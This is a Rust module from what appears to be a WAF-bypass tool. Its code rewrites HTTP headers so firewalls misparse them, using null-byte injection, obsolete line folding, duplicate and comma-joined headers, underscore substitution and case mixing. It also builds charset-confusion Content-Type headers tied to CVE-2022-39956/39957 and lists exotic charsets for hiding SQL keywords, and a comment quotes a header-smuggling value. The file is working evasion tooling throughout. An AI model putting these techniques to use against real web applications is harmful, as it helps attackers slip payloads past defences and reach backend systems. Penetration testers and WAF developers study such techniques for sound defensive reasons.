wafrift_encoding/header.rs
1//! HTTP header obfuscation for WAF bypass.
2//!
3//! WAFs inspect HTTP headers to detect malicious requests. This module
4//! applies transformations that are valid per HTTP RFCs but confuse
5//! WAF header parsers, causing them to misparse or skip inspection.
6//!
7//! # Techniques
8//!
9//! - **Case mixing** — `cOnTeNt-TyPe` instead of `Content-Type`
10//! - **Whitespace tricks** — tabs, spaces around colons and values
11//! - **Header folding** — obsolete but still parsed by many servers (RFC 7230 §3.2.4)
12//! - **Duplicate headers** — first vs. last wins disagreement
13//! - **Underscore substitution** — `Content_Type` accepted by some servers
//! - **Null byte injection** — `Conten\x00t-Type`: a NUL in the middle of the name truncates it for NUL-terminated parsers
//! - **Trailing space** — `Content-Type : value`, a space between the header name and the colon
16//! - **Header value wrapping** — Value spread across multiple continuation lines
17//! - **Comma-joined header values** — Multiple values in one header via comma
18
19use std::fmt;
20use wafrift_types::hash::{FNV_OFFSET_64, FNV_PRIME_64};
21
/// A header transformation technique.
///
/// Each variant names one obfuscation this module can apply to a header
/// line. The `Display` impl renders a variant as a kebab-case label
/// (e.g. `case-mixing`).
///
/// The enum is `#[non_exhaustive]`, so downstream crates must keep a
/// wildcard arm when matching on it.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, serde::Serialize, serde::Deserialize)]
#[non_exhaustive]
pub enum HeaderTechnique {
    /// Mixed-case header name, e.g. `cOnTeNt-TyPe` (see `case_mix`).
    CaseMixing,
    /// Tab character instead of space after colon: `Name:\tvalue`.
    TabSeparator,
    /// Extra spaces (2–5, derived from a hash of the name and value) on
    /// both sides of the header value.
    WhitespacePadding,
    /// Obsolete header folding: the value is split once and continued on
    /// a second line introduced by CRLF + tab.
    LineFolding,
    /// Same single fold as `LineFolding`, but the continuation line is
    /// introduced by a bare LF instead of CRLF.
    LfOnlyLineFolding,
    /// Duplicate header: a line with a benign value first, then the line
    /// with the real value.
    DuplicateHeader,
    /// Underscore instead of hyphen in header name (`Content_Type`).
    UnderscoreSubstitution,
    /// Null byte injected at the midpoint of the header name.
    NullByteInjection,
    /// Trailing space before colon in header name: `Name : value`.
    TrailingSpace,
    /// Header value split into three segments across two CRLF-introduced
    /// continuation lines.
    MultiLineFolding,
    /// Same three-segment fold as `MultiLineFolding`, using bare LF.
    LfOnlyMultiLineFolding,
    /// Benign and real values comma-joined in a single header:
    /// `Name: benign, real`.
    CommaJoin,
}
51
52impl fmt::Display for HeaderTechnique {
53 fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
54 match self {
55 Self::CaseMixing => f.write_str("case-mixing"),
56 Self::TabSeparator => f.write_str("tab-separator"),
57 Self::WhitespacePadding => f.write_str("whitespace-padding"),
58 Self::LineFolding => f.write_str("line-folding"),
59 Self::LfOnlyLineFolding => f.write_str("lf-only-line-folding"),
60 Self::DuplicateHeader => f.write_str("duplicate-header"),
61 Self::UnderscoreSubstitution => f.write_str("underscore-substitution"),
62 Self::NullByteInjection => f.write_str("null-byte-injection"),
63 Self::TrailingSpace => f.write_str("trailing-space"),
64 Self::MultiLineFolding => f.write_str("multi-line-folding"),
65 Self::LfOnlyMultiLineFolding => f.write_str("lf-only-multi-line-folding"),
66 Self::CommaJoin => f.write_str("comma-join"),
67 }
68 }
69}
70
71/// Apply case mixing to a header name.
72///
73/// Produces `cOnTeNt-TyPe` style output. HTTP header names are defined
74/// as case-insensitive (RFC 7230 §3.2), so servers accept any casing,
75/// but some WAFs only match canonical `Content-Type`.
76#[must_use]
77pub fn case_mix(header_name: &str) -> String {
78 crate::encoding::keyword::alternating_case(header_name, false)
79}
80
/// Remove every CR (`\r`), LF (`\n`) and NUL (`\0`) character from a
/// header value; all other characters are kept in their original order.
///
/// This is the single choke point that stops a mutator's output from
/// smuggling a second header line. Before it existed, the public
/// mutators embedded `value` verbatim, so a value such as
/// `"x\r\nEvil-Header: pwn"` became response splitting / request
/// smuggling on the wire: the transport layer assumed the helpers had
/// sanitised, and the helpers assumed the transport layer would.
/// Sanitising here closes that gap without changing any public
/// signature.
fn sanitize_header_value(value: &str) -> String {
    // The result can never be longer than the input.
    let mut cleaned = String::with_capacity(value.len());
    for ch in value.chars() {
        if !matches!(ch, '\r' | '\n' | '\0') {
            cleaned.push(ch);
        }
    }
    cleaned
}
95
96/// Apply tab separator: `Header:\tvalue` instead of `Header: value`.
97#[must_use]
98pub fn tab_separator(header_name: &str, value: &str) -> String {
99 let value = sanitize_header_value(value);
100 format!("{header_name}:\t{value}")
101}
102
103/// Apply whitespace padding around the value.
104///
105/// F136: pad count is derived deterministically from `header_name + value`
106/// via FNV-1a, NOT `rand::random`. A non-deterministic encoder cannot be
107/// regression-pinned and makes a successful bypass impossible to reproduce
108/// (every other tamper in this crate is deterministic for exactly this
109/// reason — see `parameter_pollute`'s F114 fix). The output pad range
110/// (2–5 spaces) is unchanged.
111#[must_use]
112pub fn whitespace_pad(header_name: &str, value: &str) -> String {
113 let value = sanitize_header_value(value);
114 let mut h: u64 = FNV_OFFSET_64;
115 for b in header_name.bytes().chain(value.bytes()) {
116 h ^= u64::from(b);
117 h = h.wrapping_mul(FNV_PRIME_64);
118 }
119 let pad_count = (h as usize % 4) + 2; // 2–5 spaces, deterministic
120 let pad = " ".repeat(pad_count);
121 format!("{header_name}:{pad}{value}{pad}")
122}
123
124/// Apply obsolete line folding (RFC 7230 §3.2.4).
125///
126/// The header value is split across two lines with a continuation marker
127/// (CRLF followed by a space or tab). This is obsolete but many servers
128/// still accept it, while WAFs often do not reassemble folded headers.
129#[must_use]
130pub fn line_fold(header_name: &str, value: &str) -> String {
131 line_fold_with_ending(header_name, value, "\r\n")
132}
133
134/// Apply LF-only line folding.
135#[must_use]
136pub fn lf_only_line_fold(header_name: &str, value: &str) -> String {
137 line_fold_with_ending(header_name, value, "\n")
138}
139
140fn line_fold_with_ending(header_name: &str, value: &str, ending: &str) -> String {
141 let value = sanitize_header_value(value);
142 if value.len() < 4 {
143 return format!("{header_name}: {value}");
144 }
145 let mid = crate::floor_char_boundary(&value, value.len() / 2);
146 format!(
147 "{}: {}{ending}\t{}",
148 header_name,
149 &value[..mid],
150 &value[mid..]
151 )
152}
153
154/// Apply multi-line folding — value spread across 3+ continuation lines.
155///
156/// More aggressive than single fold — splits value into thirds.
157/// Many WAFs only handle one continuation line.
158#[must_use]
159pub fn multi_line_fold(header_name: &str, value: &str) -> String {
160 multi_line_fold_with_ending(header_name, value, "\r\n")
161}
162
163/// Apply LF-only multi-line folding.
164#[must_use]
165pub fn lf_only_multi_line_fold(header_name: &str, value: &str) -> String {
166 multi_line_fold_with_ending(header_name, value, "\n")
167}
168
169fn multi_line_fold_with_ending(header_name: &str, value: &str, ending: &str) -> String {
170 let value = sanitize_header_value(value);
171 if value.len() < 6 {
172 return format!("{header_name}: {value}");
173 }
174 let t1 = crate::floor_char_boundary(&value, value.len() / 3);
175 let t2 = crate::floor_char_boundary(&value, value.len() * 2 / 3);
176 format!(
177 "{}: {}{ending} {}{ending}\t{}",
178 header_name,
179 &value[..t1],
180 &value[t1..t2],
181 &value[t2..]
182 )
183}
184
185/// Generate a duplicate header pair: returns `(benign_line, real_line)`.
186///
187/// Some WAFs only inspect the first occurrence of a header, while many
188/// servers use the last. By placing a benign value first and the real
189/// value second, the WAF sees the benign header, the server sees the
190/// real one.
191#[must_use]
192pub fn duplicate_header(
193 header_name: &str,
194 real_value: &str,
195 benign_value: &str,
196) -> (String, String) {
197 let real = sanitize_header_value(real_value);
198 let benign = sanitize_header_value(benign_value);
199 (
200 format!("{header_name}: {benign}"),
201 format!("{header_name}: {real}"),
202 )
203}
204
/// Return `header_name` with every `-` replaced by `_`.
///
/// Some server stacks (notably PHP's `$_SERVER` and CGI) normalise
/// `Content_Type` to the same key as `Content-Type`, while WAFs
/// typically match on the hyphenated spelling only.
#[must_use]
pub fn underscore_substitute(header_name: &str) -> String {
    header_name
        .chars()
        .map(|ch| if ch == '-' { '_' } else { ch })
        .collect()
}
213
214/// Inject a null byte into the header name at the midpoint.
215///
216/// Some C-based WAF implementations (modSecurity, native nginx modules)
217/// use null-terminated string operations internally. A null byte in the
218/// header name causes the WAF to see a truncated name (e.g., `Content`
219/// instead of `Content-Type\x00`), while the upstream server may parse
220/// the full name.
221#[must_use]
222pub fn null_byte_inject(header_name: &str) -> String {
223 if header_name.len() < 2 {
224 return header_name.to_string();
225 }
226 let mid = crate::floor_char_boundary(header_name, header_name.len() / 2);
227 format!("{}\x00{}", &header_name[..mid], &header_name[mid..])
228}
229
230/// Add a trailing space before the colon separator.
231///
232/// `Content-Type : value` — some parsers strip the space, making this
233/// equivalent. WAFs that expect `Name:` or `Name: ` without extra space
234/// in the header name field may fail to match.
235#[must_use]
236pub fn trailing_space(header_name: &str, value: &str) -> String {
237 let value = sanitize_header_value(value);
238 format!("{header_name} : {value}")
239}
240
241/// Comma-join multiple values into a single header.
242///
243/// Per RFC 7230 §3.2.6, a recipient may combine multiple header fields
244/// with the same name into one `field-value` separated by commas.
245/// `Header: benign, malicious` is semantically equivalent to two
246/// separate `Header: benign` and `Header: malicious` lines. WAFs that
247/// split on the first comma may only inspect `benign`.
248#[must_use]
249pub fn comma_join(header_name: &str, real_value: &str, benign_value: &str) -> String {
250 let real = sanitize_header_value(real_value);
251 let benign = sanitize_header_value(benign_value);
252 format!("{header_name}: {benign}, {real}")
253}
254
/// Build a `Content-Type` header with an exotic charset claim.
///
/// CVE-2022-39956 (Content-Type/Content-Transfer-Encoding abuse) +
/// CVE-2022-39957 (Accept-Charset bypass) — OWASP CRS pre-3.3.3 did
/// not validate the charset field before running UTF-8 regex rules.
/// Attacker claims `charset=ibm037` (EBCDIC) or `charset=utf-32`;
/// WAF runs regex against bytes that aren't even ASCII-`SELECT`, so
/// the rule misses. Backend re-decodes via its own charset
/// negotiation and sees the original payload.
///
/// Still relevant for unpatched CRS deployments AND for WAFs
/// (Cloudflare, AWS) that don't fully validate charset before
/// scanning. Fixed in CRS 3.3.3 / 3.2.2 (Sept 2022).
///
/// # Arguments
///
/// * `media_type` — the media type to claim, e.g. `application/json`.
/// * `charset` — the charset label to claim, e.g. `ibm037`.
///
/// # Returns
///
/// The line `Content-Type: <media_type>; charset=<charset>` with no
/// trailing line terminator.
///
/// CR, LF and NUL are stripped from both arguments, exactly as
/// `sanitize_header_value` does for every other public builder in this
/// module. No charset label contains those bytes, so every exotic claim
/// is emitted unchanged; the only inputs affected are ones that would
/// otherwise smuggle an extra header line onto the wire.
#[must_use]
pub fn charset_confusion(media_type: &str, charset: &str) -> String {
    // Same filter as `sanitize_header_value`: drop the characters that
    // can terminate (or truncate) a header line.
    let strip_line_breaks = |raw: &str| -> String {
        raw.chars()
            .filter(|ch| !matches!(ch, '\r' | '\n' | '\0'))
            .collect()
    };

    let media_type = strip_line_breaks(media_type);
    let charset = strip_line_breaks(charset);
    format!("Content-Type: {media_type}; charset={charset}")
}
274
/// Canonical list of exotic charset claims for `charset_confusion`.
/// Each is a real IANA charset that some backend will accept and a
/// hand-rolled WAF regex won't decode.
///
/// Entries are lowercase labels intended to be passed as the `charset`
/// argument of `charset_confusion`.
pub const EXOTIC_CHARSETS: &[&str] = &[
    "ibm037", // EBCDIC — byte values disjoint from ASCII
    "ibm500", // EBCDIC variant
    "utf-32", // 4-byte-per-char — ASCII regex misses
    "utf-32be", // UTF-32 with explicit big-endian byte order
    "utf-16", // 2-byte code units — ASCII letters are interleaved with zero bytes
    "utf-16be", // UTF-16 with explicit big-endian byte order
    "utf-7", // ASCII can be hidden in base64 runs: SELECT = +AFMARQBMAEUAQwBU-
    "shift_jis", // Japanese — partial ASCII overlap
    "gb18030", // Chinese
    "iso-2022-jp", // Stateful — toggle-byte before SELECT
];
290
291/// Apply all header obfuscation techniques to a header name/value pair.
292///
293/// Returns a vector of `(technique, obfuscated_header_line)` pairs.
294/// For `DuplicateHeader`, the two lines are joined with CRLF.
295#[must_use]
296pub fn all_obfuscations(header_name: &str, value: &str) -> Vec<(HeaderTechnique, String)> {
297 let benign = "safe_value";
298 // Three entries below (CaseMixing, UnderscoreSubstitution,
299 // NullByteInjection) transform only the header NAME and interpolate
300 // the value inline, so they must sanitise it here the same way the
301 // helper-based entries do internally — otherwise a value containing
302 // `\r\n` smuggles a header line on the wire. This is the exact gap
303 // `sanitize_header_value` was added to close; these inline format!s
304 // were missed by that fix. (The helper-based entries below sanitise
305 // internally, so passing the raw `value` to them stays correct.)
306 let safe_value = sanitize_header_value(value);
307 vec![
308 (
309 HeaderTechnique::CaseMixing,
310 format!("{}: {}", case_mix(header_name), safe_value),
311 ),
312 (
313 HeaderTechnique::TabSeparator,
314 tab_separator(header_name, value),
315 ),
316 (
317 HeaderTechnique::WhitespacePadding,
318 whitespace_pad(header_name, value),
319 ),
320 (HeaderTechnique::LineFolding, line_fold(header_name, value)),
321 (
322 HeaderTechnique::LfOnlyLineFolding,
323 lf_only_line_fold(header_name, value),
324 ),
325 (HeaderTechnique::DuplicateHeader, {
326 let (a, b) = duplicate_header(header_name, value, benign);
327 format!("{a}\r\n{b}")
328 }),
329 (
330 HeaderTechnique::UnderscoreSubstitution,
331 format!("{}: {}", underscore_substitute(header_name), safe_value),
332 ),
333 (
334 HeaderTechnique::NullByteInjection,
335 format!("{}: {}", null_byte_inject(header_name), safe_value),
336 ),
337 (
338 HeaderTechnique::TrailingSpace,
339 trailing_space(header_name, value),
340 ),
341 (
342 HeaderTechnique::MultiLineFolding,
343 multi_line_fold(header_name, value),
344 ),
345 (
346 HeaderTechnique::LfOnlyMultiLineFolding,
347 lf_only_multi_line_fold(header_name, value),
348 ),
349 (
350 HeaderTechnique::CommaJoin,
351 comma_join(header_name, value, benign),
352 ),
353 ]
354}
355
// Unit tests for this module live in the sibling file `header_tests.rs`
// (wired in via `#[path]`) and are compiled only for test builds.
#[cfg(test)]
#[path = "header_tests.rs"]
mod tests;